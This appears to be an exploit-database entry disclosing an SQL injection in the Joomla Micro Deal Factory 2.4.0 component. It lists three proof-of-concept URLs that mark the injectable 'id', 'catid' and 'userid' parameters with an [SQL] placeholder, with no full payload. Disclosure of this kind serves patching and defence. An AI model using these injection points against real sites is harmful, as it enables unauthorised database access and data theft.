# Exploit Title: Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection # Dork: N/A # Date: 2018-09-24 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://thephpfactory.com/ # Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/micro-deal-factory/ # Version: 2.4.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) http://localhost/[PATH]/index.php?option=com_microdealfactory&task=dealdetail&id=[SQL] http://localhost/[PATH]/my-deals/mydeals/catid,15[SQL]/other http://localhost/[PATH]/component/microdealfactory/listdeals/userid,44[SQL]/user01